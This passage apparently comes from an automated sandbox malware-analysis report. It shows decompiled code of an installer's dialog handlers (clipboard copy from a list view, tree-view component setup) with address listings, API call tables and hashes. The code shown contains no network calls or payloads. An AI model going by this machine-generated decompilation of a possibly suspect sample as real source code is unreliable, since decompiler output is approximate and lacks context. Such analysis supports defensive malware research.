								}
								_t160 = CreatePopupMenu();
								AppendMenuA(_t160, _t149, 1, E00405B88(_t149, _t154, _t160, _t149, 0xffffffe1));
								_t92 = _a16;
								if(_t92 != 0xffffffff) {
									_t150 = _t92;
									_t94 = _t92 >> 0x10;
								} else {
									GetWindowRect(_t154,  &_v28);
									_t150 = _v28.left;
									_t94 = _v28.top;
								}
								_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
								_t162 = 1;
								if(_t95 == 1) {
									_v60 = _t149;
									_v48 = 0x4204a0;
									_v44 = 0xfff;
									_a4 = _a8;
									do {
										_a4 = _a4 - 1;
										_t162 = _t162 + SendMessageA(_v8, 0x102d, _a4,  &_v68) + 2;
									} while (_a4 != _t149);
									OpenClipboard(_t149);
									EmptyClipboard();
									_t101 = GlobalAlloc(0x42, _t162);
									_a4 = _t101;
									_t163 = GlobalLock(_t101);
									do {
										_v48 = _t163;
										_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
										 *_t164 = 0xa0d;
										_t163 = _t164 + 2;
										_t149 = _t149 + 1;
									} while (_t149 < _a8);
									GlobalUnlock(_a4);
									SetClipboardData(1, _a4);
									CloseClipboard();
								}
								goto L37;
							}
						}
						if( *0x42366c == _t149) {
							ShowWindow( *0x423ea8, 8);
							if( *0x423f2c == _t149) {
								E00404F04( *((intOrPtr*)( *0x41fc70 + 0x34)), _t149);
							}
							E00403EF1(1);
							goto L25;
						}
						 *0x41f868 = 2;
						E00403EF1(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E00403F7F(_a8, _a12, _a16);
						}
						ShowWindow( *0x423670, _t149);
						ShowWindow(_t154, 8);
						E00403F4D(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x423eb0;
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x423670 = GetDlgItem(_a4, 0x403);
				 *0x423668 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x423684 = _t127;
				_v8 = _t127;
				E00403F4D( *0x423670);
				 *0x423674 = E004047A6(4);
				 *0x42368c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403F18(_a4);
				if(( *0x423eb8 & 0x00000003) != 0) {
					ShowWindow( *0x423670, _t149);
					if(( *0x423eb8 & 0x00000002) != 0) {
						 *0x423670 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403F4D( *0x423668);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x423eb8 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}
































                                                                                                                0x0040504b
                                                                                                                0x00405051
                                                                                                                0x0040505a
                                                                                                                0x0040505d
                                                                                                                0x004051f5
                                                                                                                0x00405219
                                                                                                                0x00405219
                                                                                                                0x0040522c
                                                                                                                0x0040524a
                                                                                                                0x00405251
                                                                                                                0x004052a8
                                                                                                                0x004052ac
                                                                                                                0x00000000
                                                                                                                0x004052b3
                                                                                                                0x004052bb
                                                                                                                0x004052c3
                                                                                                                0x004052c6
                                                                                                                0x004053bf
                                                                                                                0x00000000
                                                                                                                0x004053bf
                                                                                                                0x004052d5
                                                                                                                0x004052e1
                                                                                                                0x004052e7
                                                                                                                0x004052ed
                                                                                                                0x00405302
                                                                                                                0x00405308
                                                                                                                0x004052ef
                                                                                                                0x004052f4
                                                                                                                0x004052fa
                                                                                                                0x004052fd
                                                                                                                0x004052fd
                                                                                                                0x00405318
                                                                                                                0x00405320
                                                                                                                0x00405323
                                                                                                                0x0040532c
                                                                                                                0x0040532f
                                                                                                                0x00405336
                                                                                                                0x0040533d
                                                                                                                0x00405345
                                                                                                                0x00405345
                                                                                                                0x0040535c
                                                                                                                0x0040535c
                                                                                                                0x00405363
                                                                                                                0x00405369
                                                                                                                0x00405372
                                                                                                                0x00405379
                                                                                                                0x00405382
                                                                                                                0x00405384
                                                                                                                0x00405387
                                                                                                                0x00405396
                                                                                                                0x00405398
                                                                                                                0x0040539e
                                                                                                                0x0040539f
                                                                                                                0x004053a0
                                                                                                                0x004053a8
                                                                                                                0x004053b3
                                                                                                                0x004053b9
                                                                                                                0x004053b9
                                                                                                                0x00000000
                                                                                                                0x00405323
                                                                                                                0x004052ac
                                                                                                                0x00405259
                                                                                                                0x00405289
                                                                                                                0x00405291
                                                                                                                0x0040529c
                                                                                                                0x0040529c
                                                                                                                0x004052a3
                                                                                                                0x00000000
                                                                                                                0x004052a3
                                                                                                                0x0040525d
                                                                                                                0x00405267
                                                                                                                0x00000000
                                                                                                                0x0040522e
                                                                                                                0x00405234
                                                                                                                0x0040526c
                                                                                                                0x00000000
                                                                                                                0x00405275
                                                                                                                0x0040523d
                                                                                                                0x00405242
                                                                                                                0x00405245
                                                                                                                0x00000000
                                                                                                                0x00405245
                                                                                                                0x0040522c
                                                                                                                0x00405063
                                                                                                                0x00405067
                                                                                                                0x00405070
                                                                                                                0x00405077
                                                                                                                0x0040507a
                                                                                                                0x0040507d
                                                                                                                0x00405080
                                                                                                                0x00405081
                                                                                                                0x00405082
                                                                                                                0x0040509b
                                                                                                                0x0040509e
                                                                                                                0x004050a8
                                                                                                                0x004050b7
                                                                                                                0x004050bf
                                                                                                                0x004050c7
                                                                                                                0x004050cc
                                                                                                                0x004050cf
                                                                                                                0x004050db
                                                                                                                0x004050e4
                                                                                                                0x004050ed
                                                                                                                0x00405110
                                                                                                                0x00405116
                                                                                                                0x00405127
                                                                                                                0x0040512c
                                                                                                                0x0040513a
                                                                                                                0x00405148
                                                                                                                0x00405148
                                                                                                                0x0040514d
                                                                                                                0x0040515b
                                                                                                                0x0040515b
                                                                                                                0x00405160
                                                                                                                0x00405163
                                                                                                                0x00405168
                                                                                                                0x00405174
                                                                                                                0x0040517d
                                                                                                                0x0040518a
                                                                                                                0x00405199
                                                                                                                0x0040518c
                                                                                                                0x00405191
                                                                                                                0x00405191
                                                                                                                0x004051a5
                                                                                                                0x004051a5
                                                                                                                0x004051b9
                                                                                                                0x004051c2
                                                                                                                0x004051cb
                                                                                                                0x004051db
                                                                                                                0x004051e7
                                                                                                                0x004051e7
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32 ref: 004050A1
                                                                                                                • GetDlgItem.USER32 ref: 004050B0
                                                                                                                • GetClientRect.USER32 ref: 004050ED
                                                                                                                • GetSystemMetrics.USER32 ref: 004050F5
                                                                                                                • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00405116
                                                                                                                • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405127
                                                                                                                • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 0040513A
                                                                                                                • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00405148
                                                                                                                • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040515B
                                                                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040517D
                                                                                                                • ShowWindow.USER32(?,00000008), ref: 00405191
                                                                                                                • GetDlgItem.USER32 ref: 004051B2
                                                                                                                • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004051C2
                                                                                                                • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004051DB
                                                                                                                • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 004051E7
                                                                                                                • GetDlgItem.USER32 ref: 004050BF
                                                                                                                  • Part of subcall function 00403F4D: SendMessageA.USER32(00000028,?,00000001,00403D7E), ref: 00403F5B
                                                                                                                • GetDlgItem.USER32 ref: 00405204
                                                                                                                • CreateThread.KERNEL32 ref: 00405212
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00405219
                                                                                                                • ShowWindow.USER32(00000000), ref: 0040523D
                                                                                                                • ShowWindow.USER32(?,00000008), ref: 00405242
                                                                                                                • ShowWindow.USER32(00000008), ref: 00405289
                                                                                                                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052BB
                                                                                                                • CreatePopupMenu.USER32 ref: 004052CC
                                                                                                                • AppendMenuA.USER32 ref: 004052E1
                                                                                                                • GetWindowRect.USER32 ref: 004052F4
                                                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405318
                                                                                                                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405353
                                                                                                                • OpenClipboard.USER32(00000000), ref: 00405363
                                                                                                                • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405369
                                                                                                                • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405372
                                                                                                                • GlobalLock.KERNEL32 ref: 0040537C
                                                                                                                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405390
                                                                                                                • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004053A8
                                                                                                                • SetClipboardData.USER32 ref: 004053B3
                                                                                                                • CloseClipboard.USER32 ref: 004053B9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                • String ID: {
                                                                                                                • API String ID: 590372296-366298937
                                                                                                                • Opcode ID: 5aa5e299d21103ac010b4f938d0fd54a6532c41be376ce1bb5dd201a3ba19c05
                                                                                                                • Instruction ID: b28aa7ce0402c6385ba5b6cd868a6258f1d07b471923b7bae974b2a68da01879
                                                                                                                • Opcode Fuzzy Hash: 5aa5e299d21103ac010b4f938d0fd54a6532c41be376ce1bb5dd201a3ba19c05
                                                                                                                • Instruction Fuzzy Hash: 34A14870904208FFDB219F60DD89AAE7F79FB08355F00417AFA05BA2A0C7795A41DF69
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00404853, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478windowmemoryCOMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 97%
                                                                                                                			E00404853(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				int _t196;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423ec8;
				_t320 = SendMessageA;
				_v8 = _t182;
				_t315 = 0;
				_v32 = _t280;
				_v20 =  *0x423eb0 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t289;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
							if(( *0x423eb9 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t315) {
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E004047D3(_v8, _a8 != 0x413);
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									if((_t289 & 0x00000010) == 0) {
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
										} else {
											_t300 = _t289 ^ 0x00000080;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t289 = 1;
										_a8 = 0x40f;
										_a12 = 1;
										_a16 =  !( *0x423eb8) >> 0x00000008 & 1;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t315, _t315);
							}
							if(_a8 == 0x40b) {
								_t220 =  *0x42047c;
								if(_t220 != _t315) {
									ImageList_Destroy(_t220);
								}
								_t221 =  *0x420494;
								if(_t221 != _t315) {
									GlobalFree(_t221);
								}
								 *0x42047c = _t315;
								 *0x420494 = _t315;
								 *0x423f00 = _t315;
							}
							if(_a8 != 0x40f) {
								L86:
								if(_a8 == 0x420 && ( *0x423eb9 & 0x00000001) != 0) {
									_t316 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t316);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
								}
								goto L89;
							} else {
								E004011EF(_t289, _t315, _t315);
								if(_a12 != _t315) {
									E0040140B(8);
								}
								if(_a16 == _t315) {
									L73:
									E004011EF(_t289, _t315, _t315);
									_v32 =  *0x420494;
									_t196 =  *0x423ec8;
									_v60 = 0xf030;
									_v16 = _t315;
									if( *0x423ecc <= _t315) {
										L84:
										InvalidateRect(_v8, _t315, 1);
										if( *((intOrPtr*)( *0x42367c + 0x10)) != _t315) {
											E004046F1(0x3ff, 0xfffffffb, E004047A6(5));
										}
										goto L86;
									}
									_t281 = _t196 + 8;
									do {
										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
										if(_t202 != _t315) {
											_t291 =  *_t281;
											_v68 = _t202;
											_v72 = 8;
											if((_t291 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t281[4]);
												_t281[0] = _t281[0] & 0x000000fe;
											}
											if((_t291 & 0x00000040) == 0) {
												_t206 = (_t291 & 0x00000001) + 1;
												if((_t291 & 0x00000010) != 0) {
													_t206 = _t206 + 3;
												}
											} else {
												_t206 = 3;
											}
											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t315,  &_v72);
										}
										_v16 = _v16 + 1;
										_t281 =  &(_t281[0x106]);
									} while (_v16 <  *0x423ecc);
									goto L84;
								} else {
									_t282 = E004012E2( *0x420494);
									E00401299(_t282);
									_t217 = 0;
									_t289 = 0;
									if(_t282 <= _t315) {
										L72:
										SendMessageA(_v12, 0x14e, _t289, _t315);
										_a16 = _t282;
										_a8 = 0x420;
										goto L73;
									} else {
										goto L69;
									}
									do {
										L69:
										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
											_t289 = _t289 + 1;
										}
										_t217 = _t217 + 1;
									} while (_t217 < _t282);
									goto L72;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L89;
						} else {
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
								_t283 = 0x20;
							}
							E00401299(_t283);
							SendMessageA(_a4, 0x420, _t315, _t283);
							_a12 = 1;
							_a16 = _t315;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x423f00 = _a4;
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x420494 = GlobalAlloc(0x40,  *0x423ecc << 2);
					_t250 = LoadBitmapA( *0x423ea0, 0x6e);
					 *0x420488 =  *0x420488 | 0xffffffff;
					_v24 = _t250;
					 *0x420490 = SetWindowLongA(_v8, 0xfffffffc, E00404E54);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42047c = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x42047c);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405B88(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403F18(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403F18(_a4);
					_t318 = 0;
					_t288 = 0;
					if( *0x423ecc <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									if((_t269 & 0x00000004) == 0) {
										 *( *0x420494 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x420494 + _t318 * 4) = _t274;
									_t288 =  *( *0x420494 + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_v24 = _t311;
						} while (_t318 <  *0x423ecc);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403F4D(_v8);
								_t280 = _v32;
								_t315 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403F4D(_v12);
								L89:
								return E00403F7F(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                                                                                                0x00404871
                                                                                                                0x00404877
                                                                                                                0x00404879
                                                                                                                0x0040487f
                                                                                                                0x00404885
                                                                                                                0x00404892
                                                                                                                0x0040489b
                                                                                                                0x0040489e
                                                                                                                0x004048a1
                                                                                                                0x00404ac9
                                                                                                                0x00404ad0
                                                                                                                0x00404ae4
                                                                                                                0x00404ad2
                                                                                                                0x00404ad4
                                                                                                                0x00404ad7
                                                                                                                0x00404ad8
                                                                                                                0x00404adf
                                                                                                                0x00404adf
                                                                                                                0x00404af0
                                                                                                                0x00404afe
                                                                                                                0x00404b01
                                                                                                                0x00404b17
                                                                                                                0x00404b8f
                                                                                                                0x00404b92
                                                                                                                0x00404b94
                                                                                                                0x00404b9e
                                                                                                                0x00404bac
                                                                                                                0x00404bac
                                                                                                                0x00404bae
                                                                                                                0x00404bb8
                                                                                                                0x00404bbe
                                                                                                                0x00404bdf
                                                                                                                0x00404bc0
                                                                                                                0x00404bcd
                                                                                                                0x00404bcd
                                                                                                                0x00404bbe
                                                                                                                0x00404bb8
                                                                                                                0x00000000
                                                                                                                0x00404b92
                                                                                                                0x00404b1c
                                                                                                                0x00404b27
                                                                                                                0x00404b2c
                                                                                                                0x00404b33
                                                                                                                0x00404b3a
                                                                                                                0x00404b44
                                                                                                                0x00404b44
                                                                                                                0x00404b48
                                                                                                                0x00404b4d
                                                                                                                0x00404b52
                                                                                                                0x00404b68
                                                                                                                0x00404b54
                                                                                                                0x00404b54
                                                                                                                0x00404b5c
                                                                                                                0x00404b63
                                                                                                                0x00404b5e
                                                                                                                0x00404b5e
                                                                                                                0x00404b5e
                                                                                                                0x00404b5c
                                                                                                                0x00404b6c
                                                                                                                0x00404b6e
                                                                                                                0x00404b7c
                                                                                                                0x00404b7d
                                                                                                                0x00404b89
                                                                                                                0x00404b8c
                                                                                                                0x00404b8c
                                                                                                                0x00404b4d
                                                                                                                0x00000000
                                                                                                                0x00404b3a
                                                                                                                0x00404b1e
                                                                                                                0x00404b25
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00404be2
                                                                                                                0x00404be2
                                                                                                                0x00404be9
                                                                                                                0x00404c5d
                                                                                                                0x00404c64
                                                                                                                0x00404c70
                                                                                                                0x00404c70
                                                                                                                0x00404c79
                                                                                                                0x00404c7b
                                                                                                                0x00404c82
                                                                                                                0x00404c85
                                                                                                                0x00404c85
                                                                                                                0x00404c8b
                                                                                                                0x00404c92
                                                                                                                0x00404c95
                                                                                                                0x00404c95
                                                                                                                0x00404c9b
                                                                                                                0x00404ca1
                                                                                                                0x00404ca7
                                                                                                                0x00404ca7
                                                                                                                0x00404cb4
                                                                                                                0x00404e01
                                                                                                                0x00404e08
                                                                                                                0x00404e25
                                                                                                                0x00404e2b
                                                                                                                0x00404e3d
                                                                                                                0x00404e3d
                                                                                                                0x00000000
                                                                                                                0x00404cba
                                                                                                                0x00404cbc
                                                                                                                0x00404cc4
                                                                                                                0x00404cc8
                                                                                                                0x00404cc8
                                                                                                                0x00404cd0
                                                                                                                0x00404d11
                                                                                                                0x00404d13
                                                                                                                0x00404d23
                                                                                                                0x00404d26
                                                                                                                0x00404d2b
                                                                                                                0x00404d32
                                                                                                                0x00404d35
                                                                                                                0x00404dd7
                                                                                                                0x00404ddd
                                                                                                                0x00404deb
                                                                                                                0x00404dfc
                                                                                                                0x00404dfc
                                                                                                                0x00000000
                                                                                                                0x00404deb
                                                                                                                0x00404d3b
                                                                                                                0x00404d3e
                                                                                                                0x00404d44
                                                                                                                0x00404d49
                                                                                                                0x00404d4b
                                                                                                                0x00404d4d
                                                                                                                0x00404d53
                                                                                                                0x00404d5a
                                                                                                                0x00404d5f
                                                                                                                0x00404d66
                                                                                                                0x00404d69
                                                                                                                0x00404d69
                                                                                                                0x00404d70
                                                                                                                0x00404d7c
                                                                                                                0x00404d80
                                                                                                                0x00404d82
                                                                                                                0x00404d82
                                                                                                                0x00404d72
                                                                                                                0x00404d74
                                                                                                                0x00404d74
                                                                                                                0x00404da2
                                                                                                                0x00404dae
                                                                                                                0x00404dbd
                                                                                                                0x00404dbd
                                                                                                                0x00404dbf
                                                                                                                0x00404dc2
                                                                                                                0x00404dcb
                                                                                                                0x00000000
                                                                                                                0x00404cd2
                                                                                                                0x00404cdd
                                                                                                                0x00404ce0
                                                                                                                0x00404ce5
                                                                                                                0x00404ce7
                                                                                                                0x00404ceb
                                                                                                                0x00404cfb
                                                                                                                0x00404d05
                                                                                                                0x00404d07
                                                                                                                0x00404d0a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00404ced
                                                                                                                0x00404ced
                                                                                                                0x00404cf3
                                                                                                                0x00404cf5
                                                                                                                0x00404cf5
                                                                                                                0x00404cf6
                                                                                                                0x00404cf7
                                                                                                                0x00000000
                                                                                                                0x00404ced
                                                                                                                0x00404cd0
                                                                                                                0x00404cb4
                                                                                                                0x00404bf1
                                                                                                                0x00000000
                                                                                                                0x00404c07
                                                                                                                0x00404c11
                                                                                                                0x00404c16
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00404c28
                                                                                                                0x00404c2d
                                                                                                                0x00404c39
                                                                                                                0x00404c39
                                                                                                                0x00404c3b
                                                                                                                0x00404c4a
                                                                                                                0x00404c4c
                                                                                                                0x00404c53
                                                                                                                0x00404c56
                                                                                                                0x00000000
                                                                                                                0x00404c56
                                                                                                                0x00404bf1
                                                                                                                0x004048a7
                                                                                                                0x004048ac
                                                                                                                0x004048b6
                                                                                                                0x004048b7
                                                                                                                0x004048c0
                                                                                                                0x004048cb
                                                                                                                0x004048d6
                                                                                                                0x004048dc
                                                                                                                0x004048ea
                                                                                                                0x004048ff
                                                                                                                0x00404904
                                                                                                                0x0040490f
                                                                                                                0x00404918
                                                                                                                0x0040492d
                                                                                                                0x0040493e
                                                                                                                0x0040494b
                                                                                                                0x0040494b
                                                                                                                0x00404950
                                                                                                                0x00404956
                                                                                                                0x00404958
                                                                                                                0x0040495b
                                                                                                                0x00404960
                                                                                                                0x00404965
                                                                                                                0x00404967
                                                                                                                0x00404967
                                                                                                                0x00404987
                                                                                                                0x00404987
                                                                                                                0x00404989
                                                                                                                0x0040498a
                                                                                                                0x0040498f
                                                                                                                0x00404992
                                                                                                                0x00404995
                                                                                                                0x00404999
                                                                                                                0x0040499e
                                                                                                                0x004049a3
                                                                                                                0x004049a7
                                                                                                                0x004049ac
                                                                                                                0x004049b1
                                                                                                                0x004049b3
                                                                                                                0x004049bb
                                                                                                                0x00404a85
                                                                                                                0x00404a98
                                                                                                                0x00000000
                                                                                                                0x004049c1
                                                                                                                0x004049c4
                                                                                                                0x004049c7
                                                                                                                0x004049ca
                                                                                                                0x004049ca
                                                                                                                0x004049d0
                                                                                                                0x004049d6
                                                                                                                0x004049d9
                                                                                                                0x004049df
                                                                                                                0x004049e0
                                                                                                                0x004049e5
                                                                                                                0x004049ee
                                                                                                                0x004049f5
                                                                                                                0x004049f8
                                                                                                                0x004049fb
                                                                                                                0x004049fe
                                                                                                                0x00404a3a
                                                                                                                0x00404a63
                                                                                                                0x00404a3c
                                                                                                                0x00404a49
                                                                                                                0x00404a49
                                                                                                                0x00404a00
                                                                                                                0x00404a03
                                                                                                                0x00404a12
                                                                                                                0x00404a1c
                                                                                                                0x00404a24
                                                                                                                0x00404a2b
                                                                                                                0x00404a33
                                                                                                                0x00404a33
                                                                                                                0x004049fe
                                                                                                                0x00404a69
                                                                                                                0x00404a6a
                                                                                                                0x00404a76
                                                                                                                0x00404a76
                                                                                                                0x00404a83
                                                                                                                0x00404a9e
                                                                                                                0x00404aa2
                                                                                                                0x00404abf
                                                                                                                0x00404ac4
                                                                                                                0x00404ac7
                                                                                                                0x00000000
                                                                                                                0x00404aa4
                                                                                                                0x00404aa9
                                                                                                                0x00404ab2
                                                                                                                0x00404e3f
                                                                                                                0x00404e51
                                                                                                                0x00404e51
                                                                                                                0x00404aa2
                                                                                                                0x00000000
                                                                                                                0x00404a83
                                                                                                                0x004049bb

                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32 ref: 0040486A
                                                                                                                • GetDlgItem.USER32 ref: 00404877
                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 004048C3
                                                                                                                • LoadBitmapA.USER32 ref: 004048D6
